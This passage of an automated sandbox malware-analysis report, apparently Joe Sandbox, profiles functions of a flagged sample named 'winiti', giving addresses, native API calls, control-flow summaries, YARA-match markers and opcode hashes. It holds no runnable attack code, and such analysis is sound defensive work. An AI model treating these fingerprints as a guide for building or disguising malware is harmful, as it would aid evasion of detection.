                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                          • Instruction ID: ee6c7ceef1adf1cf5f0f5272745ac9c454e7c3774a2bd0dbb7ae4b93fd6402ff
                          • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                          • Instruction Fuzzy Hash: AF015EB5E4020DABDB10DBE5DC42FDEB7789F14308F4041AAE90897240F635EB488B95
                          Function 0042BEE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 293 42bee3-42bf1c call 404703 call 42d153 NtClose
                          APIs
                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                          • Instruction ID: 506154e8a8f3fb9aa3bbf7faef934b62bf1fce9cdcae224abcf988a766b44963
                          • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                          • Instruction Fuzzy Hash: 60E0DF362002007BC110BB5ADC01F9B739CDBC1714F00401AFA0C67241C674790486E5
                          Function 008E07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                          Function 008DF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 303 8df9f0-8dfa05 LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                          Function 008DFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 304 8dfae8-8dfafd LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                          Function 008DFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 305 8dfb68-8dfb7d LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                          Function 008DFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                          Function 0042C263 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: ^gA
                          • API String ID: 3298025750-2986628814
                          • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                          • Instruction ID: 94010e64c3ac40ebaa8637d687da895893a5285f039648f1696056085be2b873
                          • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                          • Instruction Fuzzy Hash: 7DE06DB26042047BD610EE99DC41EAB33ACEFC9710F00441AFA18A7242D674B910CAB9
                          Function 00417A83 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 253 417a83-417aa0 254 417a32-417a40 call 42f203 253->254 255 417aa2-417aa4 253->255 258 417a50-417a61 call 42d663 254->258 259 417a42-417a4d call 42f4a3 254->259 264 417a63-417a77 LdrLoadDll 258->264 265 417a7a-417a7d 258->265 259->258 264->265
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                          • Instruction ID: 5467ce7baa1be35fd542a387db4fa72fba50a4fd1dc026b6fc6d13751b3d1b69
                          • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                          • Instruction Fuzzy Hash: B50124B1E04108BBDB10DBA49C52FDFBB78DF11348F1440AAE94893241F635EA05C7A1
                          Function 00417AA5 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 281 417aa5-417ab0 282 417ab2-417abb 281->282 283 417a58-417a61 281->283 286 417aa2-417aa4 282->286 287 417abd-417ac6 282->287 284 417a63-417a77 LdrLoadDll 283->284 285 417a7a-417a7d 283->285 284->285
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                          • Instruction ID: 649d61dad93b3462b7384ddc33fd9c8a8ef157cfa8b9e39ff11f18283cf64051
                          • Opcode Fuzzy Hash: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                          • Instruction Fuzzy Hash: A5F0903920811AAED710CA94CC41FDDBBB4EF45694F04479AE968971C1D631AA498785
                          Function 0042C213 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 288 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                          APIs
                          • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                          • Instruction ID: bf3421da550d34a33725b684d4c833155ef629d3a1766f7896df30323ebfda8e
                          • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                          • Instruction Fuzzy Hash: C3E065B2604304BBD610EE99EC41EEB33ECEFC9754F004019FA08A7241C674B9108AB9
                          Function 0042C2B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 298 42c2b3-42c2ec call 404703 call 42d153 ExitProcess
                          APIs
                          • ExitProcess.KERNELBASE(?), ref: 0042C2E7
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                          • Instruction ID: ca7a2a84a7f801cb252aaa35fdd09469841853465a89a090f00c38a162972b51
                          • Opcode Fuzzy Hash: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                          • Instruction Fuzzy Hash: EDE04F316442157BC610AA5ADC41FA7B76CDFC5754F50442AFA0867281C675B91187E4

                          Non-executed Functions

                          Function 008D0080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: [Pj
                          • API String ID: 0-2289356113
                          • Opcode ID: 262b1cf41782e79de782ed31f0a80038544268699483ce8486bb894d8e54ef3d
                          • Instruction ID: c800ff5d2417b69075cb73ad2aa898f2651764b4b41dbf35777d2747bea3ec9a
                          • Opcode Fuzzy Hash: 262b1cf41782e79de782ed31f0a80038544268699483ce8486bb894d8e54ef3d
                          • Instruction Fuzzy Hash: EFF09631208704BBDB11AB10CC85F2A7BA9FF85754F14C459F545AA293D776CC11EB22
                          Function 008F26F8 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                          • Instruction ID: 8c3b17126ed05b853d4837bf5130337b9cb480e39abc1a221889cc0800f61d9c
                          • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                          • Instruction Fuzzy Hash: 70F0C22132855DDBDB48FA789D6177A73D5FB94300F54C039EE49C7241E631DD408691
                          Function 00930101 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                          • Instruction ID: 8d79da8d3b73e1156bb344f4b7c41bce69307a6af4003340d2d915d1c6bbda91
                          • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                          • Instruction Fuzzy Hash: 3AF08C722582059FCB1CCF44C4A0BBA37B6ABC0719F24846CE50B8F690D739A881CE94
                          Function 008D00EA Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 92f9c480808c280df4479744d08069817d05d672f3c0d5aa70ef8d51f109e2a8
                          • Instruction ID: 7575e1ab72de08af2070a61ee9272544d9c8fe8fa2f5ee19b2141f9e698aa0ea
                          • Opcode Fuzzy Hash: 92f9c480808c280df4479744d08069817d05d672f3c0d5aa70ef8d51f109e2a8
                          • Instruction Fuzzy Hash: 30E09A71544B80CBC310DF14D901B1AB3E4FF88B10F10893AF406C7750D7789A04C952
                          Function 008E00C4 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                          Function 008E0048 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                          Function 008E0060 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                          Function 008E0078 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
